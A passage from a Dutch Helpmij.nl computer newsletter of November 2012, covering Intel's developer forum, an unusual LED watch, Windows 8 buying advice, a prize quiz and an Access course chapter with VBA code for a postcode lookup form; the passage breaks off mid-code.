Als men het heeft over de "PC van de toekomst" zijn we het er allemaal grotendeels over eens: het is een apparaat dat we altijd bij ons hebben. Het is afhankelijk van waar en met welke accessoires we het gebruiken en kan daarom een smartphone, tablet, laptop of desktop zijn. Maar het heeft sowieso alle belangrijke data aan boord en een verbinding naar de cloud.

Bovenstaande is de laatste jaren steeds meer werkelijkheid geworden. Internetconnecties worden sneller en stabieler. Gebruikersinterfaces worden opnieuw ontwikkeld om met de evolutie van de hardware mee te kunnen gaan.

Maar er liggen nog genoeg uitdagingen alvorens we ook echt die PC van de toekomst in huis kunnen halen. Zo kan de accuduur van de huidige mobiele apparaten nog een stuk beter, en willen we steeds minder (het liefst geen) kabels gebruiken. Ook de internetverbindingen worden sneller en stabieler. Stapje voor stapje worden er betere alternatieven voor de huidige technieken ontwikkeld.

november 2012: DSC_8185_575px..JPG

Maar waar ging het IDF dan over? Het minst spannende onderwerp is dan wel Ultrabooks. Ze zijn al lang en breed besproken, maar echt de markt veroveren hebben ze nog niet gedaan. Volgens Intel moeten Ultrabooks in feite de nieuwe standaard laptops worden. En wat mij betreft mag dat ook wel: de gemiddelde laptop weegt tegenwoordig zo'n 2,5 kilo, Ultrabooks zijn duidelijk lichter. Het lichtste uitschietertje staat momenteel op 872 gram.

Om het gat tussen de Ultrabooks en de tablets op te vullen zien we nu steeds meer hybride apparaten verschijnen. Bijvoorbeeld andersom wegklappende of zelfs afneembare schermen waardoor het een soort tablet/laptop combinatie wordt. Wie de markt in de gaten houdt ziet vrijwel elke dag nieuwe alternatieven verschijnen. Ultrabooks en tablets groeien naar elkaar toe, mede dankzij Windows 8.

november 2012: DSC_8140_575px..jpg

We moeten ook al jaren aanhoren dat Haswell in ontwikkeling is. Maar het zit er nu ook echt aan te komen. De nieuwste architectuur van Intel gaat gebakken worden op 22nm en moet weer een flink stuk sneller zijn dan Ivy Bridge. Steeds meer componenten die voorheen in de chipset of op het moederbord zaten, worden nu in de CPU geïntegreerd. Geheugencontrollers, PCI-Express en nu ook de voltage-controller zitten bij Haswell allemaal in de CPU.

Nog belangrijker bij Haswell is wel het energieverbruik. Waar we bij elke nieuwe chip verbeteringen zien van enkele procenten, wordt er nu door Intel gesproken over "ruim 20 keer zuiniger" in idle modus. Dat mag ook wel, want met de introductie van "connected stand-by" (even simpel genomen een slaapstand waarin wel belangrijke berichten zoals emails binnenkomen) heb je dat lage energieverbruik wel nodig. Haswell maakt daarvoor gebruik van de S0ix-modus.

Ook de grafische kant wordt weer flink aangepakt. Zeker bij software die nieuwe instructies als AVX2 en FMA ondersteunt gaan we grote prestatieverbeteringen zien. En om eventjes aan te tonen dat ze geen leugentjes verkondigden, liet Intel even een demo zien van Call of Duty: Modern Warfare 3, dat soepel draaide in full-hd.

november 2012: IMG_1040..JPG

En die prestaties blijven natuurlijk niet gelimiteerd tot het Ultrabook-schermpje. Nee, dat moet natuurlijk allemaal draadloos getoond kunnen worden op grotere schermen en tv's. Maar dat geeft een nieuw probleem: de huidige standaarden voor Wi-Fi zijn te traag om video in hoge resolutie door te sturen.

De nieuwste ontwikkeling heeft de naam "WiGig" gekregen, mogelijk gemaakt dankzij de 802.11ad standaard, wat een aanvulling op 802.11ac is. Ter vergelijking: de huidige netwerken komen niet verder dan een theoretische 450Mbps. Met WiGig moeten we in de praktijk gigabit-snelheden gaan zien. Oftewel, minimaal 1000Mbps, draadloos!

november 2012: WiGig-Docking-Technology-Demoed-at-IDF-2012-7-GHz-Speeds-Possible..jpg

En dan zijn we er nog niet, want we gaan een verkleining zien van de huidige 2,5" harde schijven en SSD's. Waar 7mm gebruikelijk is, wordt nu 5mm de norm. En dat heeft voordelen en nadelen: door de 2mm winst kunnen Ultrabooks en tablets nóg dunner gemaakt worden, maar dan moeten we wel gebruik gaan maken van een nieuwe aansluitingsvorm. De standaard SATA-connector is te dik, dus wordt het opgevolgd door SATA Express, een combinatie van SATA en PCI-Express. Dat gaat ook weer de nodige prestatiewinst opleveren.

Laatste puntje is de invoer. Waar een regulier toetsenbord steeds onhandiger wordt om in apparaten te stoppen, kan ook niet alle interactie vervangen worden door touch. Er worden methoden zoals spraakbesturing en bewegingsherkenning gebruikt, en dat moet dan samen tot een completere gebruikerservaring gaan leiden. De voorproefjes zien we nu al terug bij Apple en Samsung met Siri en S-Voice voor de spraakbesturing, en natuurlijk Kinect voor de bewegingsherkenning.

Al met al een veelbelovende editie van het Intel Developer Forum. Als het goed is gaan we volgend jaar een hoop ontwikkelingen van IDF terugzien in de producten voor de consument. Het is allemaal veelbelovend, nu de praktijkervaring en de prijs nog.




Kisai Tenmetsu

Auteur: jackall

Top

Kisai Tenmetsu

november 2012: tenmetsu..jpg

Vorige maand hadden we een artikel over een apart horloge, maar dit model spant zeker de kroon. Een waarschuwing vooraf: dit horloge is niet weggelegd voor een minder bedeelde rekenaar. Je moet echt wel enig denkwerk verrichten wil je de juiste tijdsaanduiding onder de knie krijgen. De cijfers worden namelijk met  gekleurde led's weergegeven.

Om een voorbeeld te noemen:
Rood staat voor 15
Geel staat voor 5
Groen staat weer voor 1

Een ander voorbeeld:
Bij elkaar genomen is 1x rood, 1x geel en 3x groen 23 uur
Dan 3x rood, 2x geel en 3x groen 58 minuten.
Bij elkaar is dit dus 23:58 uur.

De fabrikant heeft nog veel meer van dit soort aparte horloges.
Kijk zelf maar eens rond.

november 2012: tenmetsu 2..jpg




Windows 8 aanschaffen of toch liever niet?

Auteur: CorVerm

Top

Voor het gebruikersgemak hoeven we het niet aan te schaffen! Windows 8. Op het moment van schrijven (dus nog voor de lancering van de definitieve versie) kunnen we alleen nog maar uitgaan van Windows 8 RTM, een zo goed als definitieve versie. Echter, om het nieuwe Windows besturingssysteem goed te kunnen bespreken ben ik van mening dat dat het beste gedaan kan worden aan de hand van de definitieve versie. Even geduld hebben is de boodschap.

Even wat opmerkingen

Er zijn wel wat opmerkingen te maken die je aan het denken moeten zetten alvorens je naar de winkel stormt om Windows 8 aan te schaffen, of via internet gaat downloaden. Bedenk dat je, hoe ervaren je ook met Windows bent, in feite het wiel opnieuw uit zal moeten vinden. Eerdere versies (vanaf Windows 95) sloten min of meer op elkaar aan, lagen in elkaars verlengde en hadden slechts met “structuurveranderingen” te maken. Met deze versie ligt dat geheel anders, het is feitelijk een geheel nieuw besturingssysteem dat met het oude vertrouwde Windows weinig of niets meer te maken heeft. Vertrouwde zaken als bijvoorbeeld het startmenu ontbreken. “We” gaan werken met app-tegels en de zoekfunctie gebruiken om programma’s op te starten. Toegegeven, van ieder programma of toepassing kan een tegel in het openingsvenster (Windows 8 stijl-interface of tegeltjes-interface) geplaatst worden, zodoende is het opstarten van een programma of toepassing een stuk makkelijker. Heette de genoemde interface aanvankelijk “Metroblad”, die benaming wordt door Microsoft niet meer gebruikt.

De bedoeling van Windows 8

Windows 8 is gemaakt om zowel computers met touchscreens als computers met toetsenbord en muis te kunnen besturen. Microsoft richt zich hiermee op smartphones en tablet-computers. Het openingsvenster van Windows 8 ziet er uit als een smart Phone met apps en dat is niet voor niets, want het systeem werkt niet alleen op computers maar ook op tablets en telefoons. Mobiele apparaten draaien nu vooral op besturingssystemen van Apple of Google. De vraag is of je jezelf door al dat moois aangetrokken voelt, of dat je gewoon lekker simpel wilt computeren. Dat is hetgeen je jezelf af zal moeten vragen, of je met Windows 8 aan de slag (in de strijd) gaat of gewoon bij het besturingssysteem blijft waar je nu zo fijn mee werkt.

Zoals gezegd is Windows 8 ingrijpend omgegooid. Zo is de ouderwetse Windows desktop (Bureaublad) niet meer het openingsscherm en alleen via een omweg tevoorschijn te halen. De startknop is helemaal verdwenen en volgens testers is dat meteen ook het zwakke punt. Op het openingsscherm kan veel minder worden weergegeven dan vroeger op de desktop. Veel functies en aanpassingsmogelijkheden zitten ergens verborgen en ook de mappen met je eigen data bereiken gaat niet vanzelf. Dus om programma’s of toepassingen op te starten moet de zoekfunctie gebruikt worden.

Verschillende programma's tegelijk gebruiken is in Windows 8 ook anders dan we gewend zijn. De taakbalk is verdwenen. In plaats daarvan moet je met je muis linksboven in je scherm gaan staan om een lijst met actieve programma's tevoorschijn te toveren. Ook dat is behoorlijk wennen.

november 2012: startscherm..jpg
Openingsscherm Windows 8

Toch gewoon de desktop

Om al deze ergernissen te omzeilen is er wel een simpele ontsnappingsroute. Klik op de tegel Desktop (in de Nederlandse versie zal dat wel weer Bureaublad heten) en kom op de plek zoals we die gewend zijn en waar bijna alles functioneert zoals we dat kennen. Maar hoe dan ook, de startknop zullen we daar ook niet terug vinden.

De prijs

Voor eerdere Windows versies betaalden we al gauw 120 tot 250 euro. Een Upgrade naar Windows 8 Pro, kun je tijdelijk voor een speciale prijs downloaden, Download Pro voor € 29.99. Je kunt Windows 8 Pro ook laten opsturen voor € 59.99. (Scrol op de downloadpagina naar beneden voor de voorwaarden van deze actie.) Microsoft moet wel, want de concurrentie (Google, Ubuntu en andere Linux distro’s) brengt besturingssystemen ook goedkoop of zelfs gratis op de markt. Met de goedkope introductie hoopt Microsoft dat veel PC- en laptopgebruikers niet alleen thuis maar ook mobiel overstappen op Windows 8 in plaats van Apple of Android.

Het goede nieuws is dat Windows 8 in principe draait op dezelfde computers die ook krachtig genoeg zijn om Windows 7 te draaien. Aanschaf van een nieuwe computer is niet nodig.




Onze novemberprijsvraag

Auteur: Helpmij.nl

Top

Ook in november is er met onze prijsvraag weer een leuke prijs te winnen!

De vraag:

Vorige week viel dit ding op de deurmat van Helpmij.nl. Op de foto zijn de voor- en achterzijde afgebeeld. Maar...: wat is het?

november 2012: HM novemberprijsvraag..png

Stuur een e-mail met het juiste antwoord op de bovenstaande vraag vóór 30-11-12 naar wedstrijd@helpmij.nl en maak kans op dit "handige ding". Bovendien ontvangt de winnaar een licentie voor Nod32 antivirus software van ESET


LET OP! Volgende maand zijn wij al weer aan de laatste nieuwsbriefeditie van 2012 toe. Wij sluiten het jaar af met een absolute KNALLER van een prijs voor de winnaar van onze decemberprijsvraag. Mis deze dus niet! 

De prijswinnaar van onze oktoberprijsvraag:

De prijswinnaar van de maand oktober is Mark van der Laan. Hij ontvangt de schitterende Creative Sondblaster XFi Pro en een licentie voor Nod32 antivirus software van ESET. Twee anderen met de juiste oplossing ontvangen een leuke verrassing.

De antwoorden van de oktoberprijsvraag :

Antwoord 1: 2003

Antwoord 2: Creative Technology werd opgericht in 1981. Het internationale hoofdkantoor is gevestigd in Singapore.

Antwoord 3: Tomlinson Holman bij George Lucas' bedrijf Lucasfilm in 1982 om te garanderen dat het geluid in de derde Star Wars-film, Return of the Jedi, optimaal was.

De prijzen worden aangeboden door:

november 2012: Logo HM..jpg  en  november 2012: SpicyLemon-logo..png

*Bestuur en wedstrijdcommissie zijn uitgesloten van deelname!

*De winnaar wordt bekend gemaakt in de december editie van onze nieuwsbrief.




Cursus Access Voor Beginners - Hoofdstuk 15

Auteur: OctaFish

Top

Een Multi-functioneel formulier

In dit hoofdstuk pakken we de originele draad van het begin van de cursus weer op, en gaan we weer eens kijken naar de Duikclub database. Deze database kan namelijk nog wel wat formulieren etc. gebruiken!

Deze aflevering gaan we een formulier maken dat fungeert als een telefoonklapper. Zo'n formulier gebruikt knoppen om lijsten/subformulieren te filteren, en is dus bij uitstek geschikt om met grote bestanden te werken. Denk bijvoorbeeld aan de Postcodetabel, waarin alle plaatsnamen en straatnamen van Nederland of België zijn opgeslagen.

 november 2012: image001..png

 In dit plaatje zie je een overzicht van provincies in Nederland, met daarboven knoppen waarmee je de lijst kunt filteren. In dit geval overigens niet echt nodig. Klik je op een provincienaam, dan verandert het formulier, en zie je de steden van die provincie.

In de rij met knoppen zijn alleen de knoppen actief waarvan de tekst op de knop overeenkomt met de beginletter van een provincie. Je kunt dus alleen filteren op bestaande lettercombinaties.

Klik je op (bijvoorbeeld) Limburg, dan zie je de plaatsen in Limburg. Omdat de lijst nu een stuk langer is, zijn er meer letterknoppen actief. Uiteraard kun je scrollen door de lijst, maar je kunt ook filteren door op een letterknop te klikken.

 november 2012: image003..png

 Klik je bijvoorbeeld op <G>, dan zie je de volgende plaatsnamen:

 november 2012: image005..png

 De lijst is nu overzichtelijk. Wil je terug naar het overzicht van alle plaatsnamen in Limburg, dan klik je op de knop <Alle Plaatsen>. Je krijgt dan weer het overzicht van de vorige afbeelding. Met een volgende keuze krijg je van de gekozen plaats de Straatnamen te zien, met weer dezelfde keuzemogelijkheden.

De laatste laag bevat de postcodes van de gekozen straat.

 november 2012: image007..png

Het lijkt er op alsof het formulier op één bron werkt, en dat je alleen maar filtert binnen die bron, maar dat is niet zo. Bij elke keuze die je maakt, wordt een andere tabel als bron voor het formulier gebruikt. Al is dat eigenlijk ook niet helemaal waar, want het formulier gebruikt wel degelijk één vaste tabel als bron. Maar deze tabel wordt steeds opnieuw aangemaakt, en de veldnamen en gegevens in die (tijdelijke) tabel worden vastgesteld in de procedure die binnen het formulier gebruikt wordt.
Hoe de velden in die bronnen heten, doet daarbij dus niet eens zoveel ter zake, omdat de tijdelijke tabel in de procedure gevuld wordt met vaste veldnamen.

In dit hoofdstuk zitten ook functies die gebruikt worden om ook te kunnen filteren met diacrieten. Dit zijn (mede)klinkers met accenten,zoals Ä, Ñ en Ç. Zou je alleen op beginletter filteren, dan vallen er namelijk steden, straatnamen etc. af die met zo'n diacriet beginnen. Deze functies komen uiteraard ook aan bod. Laten we de procedure eens globaal doornemen! 

De elementen

Om te beginnen de knoppen: dat zijn Wisselknoppen, die zijn gemaakt met de wizard <Groepsvak>. Met de wizard kun je (in Access 2003) maximaal 20 knoppen maken, maar de overige 7 kun je probleemloos kopiëren. Het groepsvak krijgt de naam [fraSelect].

Het volgende stuk is daarna wel wat werk, want elke knop moet een logische naam krijgen, en de standaardnamen die Access aan knoppen geeft is minder geschikt. Een naam voor een knop kan het bijschrift ervan zijn (de Beginkapitaal dus), maar je mag de knoppen ook een nummer geven dat overeenkomt met de ASCII waarde van de bijbehorende letter. In het voorbeeld heten de knoppen A, B, C ... X, Y, Z en met ASCII waarden zou dat 65, 66, 67 .., 88, 89, 90 zijn. De naam stel je in via de <Eigenschappen> van de knop.

Voordeel van de laatste methode is, dat je straks geen conversie meer hoeft te doen van Letter naar Letterwaarde. Het loont dus om vooruit te denken :)

De knoppen staan in een groepsvak, zodat er maar één letter tegelijk ingedrukt kan zijn. Je mag uiteraard ook kiezen voor radiorondjes, of selectievakjes, waarmee je dan de selectie op basis van meerdere letters kunt laten uitvoeren, maar die laatste techniek wordt in dit hoofdstuk niet behandeld.

Verder staat er op het formulier een Keuzelijst (Listbox) met de naam < lstSelection> die niet gebonden is aan een rijbron, want er is steeds een andere rijbron nodig voor de keuzelijst. Het formulier is overigens ook een niet-gebonden formulier. Je muteert dus geen gegevens in de tabellen.

In de koptekst van het formulier staan nog twee verborgen tekstvakken met de namen [txtNiveau] en [txtLijst]. Deze tekstvakken zijn nodig om de statussen van het formulier bij te houden (welke tabel moet worden gebruikt, en welk veld is aangeklikt in de keuzelijst). 
En dat zijn zo'n beetje alle noodzakelijke elementen om het formulier te kunnen maken! 

De opbouw

Een formulier als dit drijft natuurlijk op VBA. Dat begint al gelijk bij het openen van het formulier, met deze code:

Private Sub Form_Open(Cancel As Integer)
    Me.txtNiveau = 1
    Call FormulierAanpassen(1)
    With Me.lblResult
        .Visible = False
        .ValidationRule = False
    End With
End Sub

Hier wordt de waarde 1 toegekend aan het tekstvak [txtNiveau]. Op zich logisch: als je het formulier opent, begin je op het hoogste niveau. Je zult zien dat deze waarde bij elk lager niveau wordt opgehoogd, en dat op basis van de nieuwe waarde andere bronnen worden geselecteerd.

In de volgende regel wordt de functie <FormulierAanpassen> aangeroepen met een parameter. En hier gebeurt het echte werk! We gaan de functie dus weer zoals gewoonlijk blokje voor blokje bekijken.

Function FormulierAanpassen(Niveau As Integer, Optional Selectie As Integer)
Dim qTmp As DAO.QueryDef
Dim fld As DAO.Field
    Select Case Me.txtNiveau
        Case 1
            strSQL = "SELECT DISTINCT StrConv(Provincie,3) As V1, " _
                 & "ProvincieID As V2, " _
                 & "EersteLetter(Provincie) AS Beginletter " _
                 & "FROM Provincie "
            If Selectie > 0 Then strSQL = strSQL & "WHERE Provincie " _
                 & "Like " & KnoppenFilter(Me.fraSelect)
            strSQL = strSQL & "ORDER BY EersteLetter(Provincie);"
            Me.lstSelection.ColumnWidths = "6cm;0cm;0cm;0cm"
        Case 2
            strSQL = "SELECT DISTINCT StrConv(Plaats,3) As V1, " _
                 & "PlaatsID  As V2,  " _
                & "EersteLetter(Plaats) AS Beginletter " _
                & "FROM Plaats " _
                & "WHERE ProvincieID=" & Me.txtLijst & " "
            If Selectie > 0 Then strSQL = strSQL & "AND Plaats " _
                 & "Like " & KnoppenFilter(Me.fraSelect)
            strSQL = strSQL & "ORDER BY EersteLetter(Plaats);"
        Case 3
            strSQL = "SELECT DISTINCT StrConv(Straat,3) As V1, " _
                 & "StraatID As V2, " _
                & "EersteLetter(Straat) AS Beginletter " _
                & "FROM Straat " _
                & "WHERE PlaatsID = " & Me.txtLijst & " "
            If Selectie > 0 Then strSQL = strSQL & "AND Straat " _
                 & "Like " & KnoppenFilter(Me.fraSelect)
            strSQL = strSQL & "ORDER BY EersteLetter(Straat);"
        Case 4
            strSQL = "SELECT Postcode As V1, Van As V2, " _
                 & "Tem As V3, Soort, " _
                & "EersteLetter(Postcode) AS Beginletter " _
                & "FROM Postcodes " _
                & "WHERE StraatID = " & Me.txtLijst & " "
            strSQL = strSQL & "ORDER BY Postcode, Soort, Van"
            Me.lstSelection.ColumnWidths = "2cm;1,5cm;1,5cm;0cm"
        Case Else
    End Select

In de naam van de functie staan de parameters die hij accepteert: (Niveau As Integer, Optional Selectie As Integer). Er is één verplichte parameter (Niveau) en een optionele: Selectie. Deze laatste wordt gebruikt om te filteren op de keuzelijst, die niet altijd een selectie zal hebben of actief zal zijn. Op het moment dat een keuzelijst de focus niet meer heeft, kun je de waarde ervan niet meer uitlezen. Daarom wordt de waarde bij het klikken weggeschreven naar een apart tekstvak op het formulier.

Vervolgens wordt op basis van het tekstvak <txtNiveau> gekeken welke query er gemaakt moet worden. Zoals je kunt zien, worden er verschillende tabellen gebruikt: [Provincie], [Plaats], [Straat] en [Postcode]. Dit hoeft overigens niet, want je kunt het systeem ook gebruiken om bijvoorbeeld categorieën en subcategorieën te tonen die in dezelfde tabel staan. In de extra oefening van dit hoofdstuk ga je een vergelijkbaar formulier in de Duikclub database maken we dat is gebaseerd op de tabel st_Duiklocaties. Gebruik je één tabel, dan zul je vaak in die tabel de verschillende niveaus al vastleggen, en dat is exact wat er gebeurt in die tabel.

Wat misschien nog opvalt, is dat bij zowel Case 1 als bij Case 4 een extra opdracht wordt gegeven, resp.
Me.lstSelection.ColumnWidths = "6cm;0cm;0cm;0cm"
en
Me.lstSelection.ColumnWidths = "2cm;1,5cm;1,5cm;0cm".
Deze regels zijn nodig omdat de layout van de tabel Postcodes niet overeenkomt met die van de overige tabellen: er zijn meer velden, en je wilt die velden ook in de keuzelijst zien. Bij Case 1 t/m Case 3 is de layout gelijk, dus je hoeft alleen bij Case 1 de layout aan te passen, en uiteraard dus bij Case 4.

Elke query gebruikt twee aparte functies, en die vind je hier:

"Plaats Like " & KnoppenFilter(Me.fraSelect)
"ORDER BY EersteLetter(Plaats)"

Deze functies worden straks behandeld. Met deze functies wordt het filter gemaakt (Knoppenfilter) en worden alle letters met diacrieten verzameld (EersteLetter).

    On Error GoTo MaakQuery
    Set qTmp = CurrentDb.QueryDefs("qTemp")
    qTmp.SQL = strSQL
    On Error GoTo 0

Er wordt een vaste query gebruikt voor het formulier, maar deze krijgt steeds een nieuwe SQL bron toegewezen, wat hierboven gebeurt. De eerste keer dat je het formulier opent, kan het voorkomen dat de query [qTemp] nog niet bestaat, en deze moet dan worden aangemaakt. Dat gebeurt in de subprocedure < MaakQuery>. Deze wordt uitgevoerd op het moment dat de procedure probeert om de SQL van het object qTemp te wijzigen.

Bestaat deze query niet, dan kan er uiteraard ook geen SQL aan worden toegewezen. De procedure levert dan een fout op. Deze fout wordt afgevangen door de regel  "On Error GoTo MaakQuery" die er voor zorgt dat de procedure verder gaat in de subprocedure MaakQuery. Die ziet er zo uit:

MaakQuery:
    Set qTmp = CurrentDb.CreateQueryDef("qTemp", strSQL)
    Resume

De variabele qTmp (van het type QueryDef) wordt aangemaakt met de opdracht "CurrentDb.CreateQueryDef("qTemp", strSQL)". Deze opdracht kan alleen worden uitgevoerd op objecten die nog niet bestaan, maar dat was ook precies de situatie! Om weer verder te gaan met de oorspronkelijke procedure, eindigt dit deel met "Resume".

De variabele wordt dus ofwel aangemaakt, met de SQL uit de variabele strSQL, ofwel wordt de SQL van de Query qTemp veranderd met de regel qTmp.SQL = strSQL.

        DoCmd.DeleteObject acTable, "Temp"
        DoCmd.OpenQuery "qTemp_Maken"
        With Me.lstSelection
            .RowSource = strSQL
            .Requery
        End With
        On Error Resume Next

In het volgend deel wordt de tijdelijke table [Temp] verwijderd, en wordt een vaste query (qTemp_Maken) uitgevoerd. Deze query gebruikt de query qTemp als basis. Dat is dus een query die steeds andere gegevens bevat, want daarvan hebben we net de SQL aangepast. Als laatste in dit deel wordt de rijbron van de Keuzelijst <lstSelection> ingesteld. Deze krijgt de query strSQL als Rowsource, en hij laat dus steeds een andere bron zien.

        For iLoop = 65 To 90
            Me(Chr(iLoop)).Enabled = False
        Next iLoop

In bovenstaande lus worden eerst alle tekstknoppen uitgeschakeld. Verderop in de procedure worden ze weer geactiveerd als er een overeenkomende beginletter in de bron zit. Omdat de knoppen een Letter als naam hebben, moet de lus gebruik maken van de functie CHR om de luswaarde te vertalen naar een letter (Me(Chr(iLoop))). Als je cijfers hebt gebruikt, hoeft dat niet: Me(iLoop).Enabled is dan voldoende.

        With CurrentDb.OpenRecordset("Temp")
            For iVeld = 0 To .Fields.Count - 1
                If .Fields(iVeld).Name = "Beginletter" Then
                    strSQL = "SELECT DISTINCT Beginletter FROM Temp"
                    With CurrentDb.OpenRecordset(strSQL)
                        If .RecordCount > 0 Then
                            .MoveFirst
                            Do While Not .EOF
                                On Error Resume Next
                                Me(.Fields(0)).Enabled = True
                                .MoveNext
                            Loop
                        End If
                    End With
                    Exit For
                End If
            Next iVeld
        End With

Deze lus controleert eerst of het veld [Beginletter] wel in de bron zit. Dat is namelijk niet het geval als de keuzelijst de Postcodes laat zien. Door daar een check op te maken, voorkom je dat de procedure een fout produceert. Vervolgens wordt de tabel [Temp] geopend, en wordt elke knop die in de tabel zit geactiveerd.

In Access 2007/2010 kan de code wat korter, omdat je rechtstreeks naar de Fields collectie van qTmp kunt verwijzen. De code ziet er dan zo uit:

    For Each fld In qTmp.Fields
        If fld.Name = "Beginletter" Then
            strSQL = "SELECT DISTINCT Beginletter FROM qTemp"
            With CurrentDb.OpenRecordset(strSQL)
                If .RecordCount > 0 Then
                    .MoveFirst
                    Do While Not .EOF
                        On Error Resume Next
                        Me(.Fields(0)).Enabled = True
                        .MoveNext
                    Loop
                End If
            End With
            Exit For
        End If
    Next fld 

Als laatste (niet echt noodzakelijke) onderdeel wordt in het tekstvak <txbResult> het aantal gevonden records gezet. Dit gebeurt op basis van de eigenschap ListCount, die kijkt hoeveel elementen de Keuzelijst bevat.

    If Me.lstSelection.ListCount <> 0 Then
        lngResult = Me.lstSelection.ListCount - 0
    Else
        lngResult = Me.lstSelection.ListCount
    End If
    Me.lblResult.Visible = True
    Me.txbResult.ValidationRule = True
    Me.fraSelect.Requery
    'Tonen resultaat in textbox
    Me.txbResult = lngResult
    Exit Function
End Function

De Keuzelijst

De keuzelijst triggert de de actie die de volgende tabel aan de keuzelijst hangt; de filterknoppen filteren dus alleen de waarden die je in de keuzelijst ziet. De actie vindt plaats op de gebeurtenis <Bij klikken> van de keuzelijst.

Private Sub lstSelection_Click()
    If Me.fraSelect.Value = 27 Then Me.txtNiveau.Value = 0
    If iNIV + 1 > 4 Then iNIV = 1 Else: iNIV = Nz(Me.txtNiveau, 0) + 1
    Me.txtNiveau.Value = iNIV

Als je op de knop <Alles> klikt, moet de lijst geschoond worden. Een klik op de knop levert als waarde 27 op (waarde van het groepsvak). De waarde txtNiveau wordt dan op 0 gezet. In andere gevallen wordt de waarde txtNiveau steeds met 1 verhoogd, tot de waarde 4 is; dan wordt de waarde ingesteld op 1. Op die manier kun je door de verschillende opties lussen, en steeds opnieuw bij het hoofdniveau beginnen. Niet noodzakelijk, maar wel handig, is het om de labels op de knoppen te laten zien wat het formulier nu doet.

    Select Case iNIV
        Case 1
            Me.lblSoort.Caption = "Provincies"
            Me.cmdAlles.Caption = "Alle Provincies"
            Me.txtVan.Visible = False
            Me.txtVan = ""
            Me.txtTot.Visible = False
            Me.txtTot = ""
        Case 2
            Me.lblSoort.Caption = "Plaatsen - " & Me.lstSelection.Column(0)
            Me.cmdAlles.Caption = "Alle Plaatsen"
        Case 3
            Me.lblSoort.Caption = "Straten - " & Me.lstSelection.Column(0)
            Me.cmdAlles.Caption = "Alle Straten"
        Case 4
            Me.lblSoort.Caption = "Postcodes - " & Me.lstSelection.Column(0)
            Me.cmdAlles.Caption = "Alle Postcodes"
    End Select

De Select Case wordt gebruikt om  het bijschrift van het groepsvak aan te passen; dat krijgt een tekst die overeenkomt met de geselecteerde waarde. Die waarde wordt weer uit de eerste kolom van de listbox gehaald.

    Me.txtLijst = Me.lstSelection.Column(1)
    Call FormulierAanpassen(iNIV)
    Exit Sub
End Sub

Als laatste wordt het formulier weer ingesteld; er moet immers een nieuwe bron worden ingelezen, en de knoppen moeten uit- en ingeschakeld worden.

De extra functies

Er worden twee functies gebruikt om resp. een filter te maken (de functie KnoppenFilter) of om een de letterknoppen in te stellen (EersteLetter).

Als eerste de functie <KnoppenFilter>. Deze gebruikt de waarde die uit het Groepsvak <fraSelect> komt; elke letter daarin krijgt van Access een unieke waarde, en die wordt meegenomen naar de functie. Kijken we naar knop <A>, dan heeft die de waarde 1. Als we de functie aanroepen, wordt dus Case 1 uitgevoerd. Bij alle letters met diacrieten wordt een tekststring gemaakt met de voorkomende letters.

Function KnoppenFilter(KnopWaarde As Integer) As String
    On Error GoTo err_Sorteren
    Select Case KnopWaarde
        Case 1
            KnoppenFilter = "'[AÀÁÂÃÄÅÆ" & LCase("AÀÁÂÃÄÅÆ") & "]*'"
        Case 3
            KnoppenFilter = "'[CÇ" & LCase("CÇ") & "]*'"
        Case 5
            KnoppenFilter = "'[EÈÉÊË" & LCase("EÈÉÊË") & "]*'"
        Case 9
            KnoppenFilter = "'[IÌÍÎÏ" & LCase("IÌÍÎÏ") & "]*'"
        Case 14
            KnoppenFilter = "'[NÑ" & LCase("NÑ") & "]*'"
        Case 15
            KnoppenFilter = "'[OÒÓÔÕÖØ" & LCase("OÒÓÔÕÖØ") & "]*'"
        Case 19
            KnoppenFilter = "'[SŠ" & LCase("SŠ") & "]*'"
        Case 21
            KnoppenFilter = "'[UÙÚÛÜ" & LCase("UÙÚÛÜ") & "]*'"
        Case 25
            KnoppenFilter = "'[" & UCase("YÝÿ") & LCase("YÝÿ") & "]*'"
        Case 27
            KnoppenFilter = "'*'"
        Case 99
            KnoppenFilter = "'*'"

De functie levert dus een tekststring op die er zo uit kan zien: '[AÀÁÂÃÄÅÆaàáâãäåæ]*'
Deze string wordt dan weer in de query gebruikt met de parameter LIKE. 
Alle overige knoppen worden op hun eigen letter gefilterd, en dat filter wordt in de Case Else opgebouwd. Hierbij weet de functie uiteraard niet op welke letter is geklikt. Vandaar dat er een letter wordt samengesteld op basis van de Letterknop waarde (van 1 tot en met 26) waarbij de getalwaarde 64 wordt opgeteld, gecombineerd met een waarde + 96. Hiermee worden zowel een hoofdletter als een kleine letter samengesteld.

        Case Else 'Alle records, dus geen beperking
            KnoppenFilter = "'[" & Chr(64 + KnopWaarde)  & Chr(96 + KnopWaarde) & "]*'"
    End Select
    Exit Function
err_Sorteren:
    MsgBox Err.Description
    Exit Function
End Function

De functie <EersteLetter> doet zo ongeveer het omgekeerde. Omdat de letter Â een andere ASCII waarde heeft als A, maar uiteraard wel in de lijst onder de knop A moet zitten, worden alle diacrieten verzameld onder de bronletter. Deze letter wordt in de query gegenereerd op basis van de naam; dat kan een plaatsnaam zijn, een straatnaam etc. De beginletter zelf wordt uit de eerste letter van de naam gehaald, maar het kan zijn dat er een voorloopteken bij de naam zit, zoals bij 't Harde. In dat geval moet de functie een H genereren, en niet een enkel aanhalingsteken ('). Er zit dus eerst een check op dat voorloopteken.

Public Function EersteLetter(Waarde As String) As String
Dim Letter As String
    Letter = Left(Waarde, 1)
    If Asc(Letter) = 39 Then
        Letter = Mid(Waarde, InStr(Waarde, " ") + 1, 1)
    End If
    If Asc(Letter) = 39 Then
        Letter = Mid(Waarde, InStr(Waarde, "-") + 1, 1)
    End If

De ASCII waarde van een enkel aanhalingsteken is 39, dus daar is prima op te controleren. Ook al omdat een enkel aanhalingsteken in Access 2003 en Access 2007/2010 staat voor een commentaar regel, en je wilt natuurlijk niet dat de procedure daar op struikelt. Er zijn twee controles: op een spatie, en op een koppelteken. Daarmee kun je de meeste gevallen wel afvangen. Heb je er meer nodig, dan kun je dat uiteraard wel inbouwen.

    Select Case Letter
        Case "À", "Á", "Â", "Ã", "Ä", "Å", "Æ"
            EersteLetter = "A"
        Case "Ç"
            EersteLetter = "C"
        Case "È", "É", "Ê", "Ë"
            EersteLetter = "E"
        Case "Ì", "Í", "Î", "Ï"
            EersteLetter = "I"
        Case "Ñ"
            EersteLetter = "N"
        Case "Ò", "Ó", "Ô", "Õ", "Ö", "Ø"
            EersteLetter = "O"
        Case "Š"
            EersteLetter = "S"
        Case "Ù", "Ú", "Û", "Ü"
            EersteLetter = "U"
        Case "Ý", "ÿ"
            EersteLetter = "Y"
        Case Else
